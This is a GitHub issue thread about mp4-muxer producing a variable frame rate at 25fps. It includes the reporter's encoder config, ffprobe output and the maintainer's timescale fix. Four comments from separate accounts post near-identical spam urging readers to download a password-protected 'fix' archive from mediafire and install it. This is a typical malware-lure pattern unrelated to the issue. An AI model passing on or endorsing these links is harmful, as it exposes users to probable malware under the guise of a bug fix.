### ISSUE TITLE
Unable to output a constant frame rate for 25fps

### ISSUE THREAD

**Issue by someguythatcodes** [Vanilagy/mp4-muxer#60]
First of all, thanks for putting this great library together, it has worked really well in my project

I'm trying to use WebCodecs with mp4-muxer to create a constant 25fps video, however the files that mp4-muxer produces come back as a variable frame rate (+/- 0.043fps) verified by running through Mediainfo/FFprobe. 

To create this file I'm using the following configuration:

```
const muxer = new MP4Muxer({
    target: new ArrayBufferTarget(),
    video: {
        codec: "avc",
        width,
        height
    },
    fastStart: false,
    firstTimestampBehavior: 'strict'
})

const encoder = new VideoEncoder({
    output: (chunk, meta) => muxer.addVideoChunk(chunk, meta),
    error: (e) => console.error(e),
});

const config: VideoEncoderConfig = {
    width,
    height,
    framerate: 25,
    codec,
    latencyMode: "quality"
};

encoder.configure(config);
```

Then adding VideoFrames with timestamp 40,000us each time, and a duration of 40,000us (40,000us = 1 frame of 25fps):

`new VideoFrame(result, { timestamp, duration: 40 * 1000 })`

I'm then using FFprobe to output all frame timestamps:
`ffprobe -select_streams v:0 -show_frames -show_entries frame=pts_time,pkt_pts_time -of csv=p=0 video.mp4`

Which returns the following results:
```
0.000000
0.040017
0.080035
0.119965
0.159983
0.200000
0.240017
0.280035
0.319965
0.359983
0.400000
0.440017
0.480035
0.519965
0.559983
0.600000
```

Note that this is using V5, and I noticed an improvement of frame timestamp deviation between V3 and V5

Any help would be much appreciated!

Thanks

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by someguythatcodes** [comment]
Interestingly, if I change the frame rate to 30fps, I do get a constant frame rate

**Comment by someguythatcodes** [comment]
Looks like it's to do with the timescale, changing from 11520 -> 11500 produces a constant 25fps file

**Comment by Vanilagy** [comment]
I addressed the issue by changing the default timescale AND adding a new `frameRate` option - will be included in the next release!

**Comment by someguythatcodes** [comment]
Fantastic, thanks for looking into so quickly!
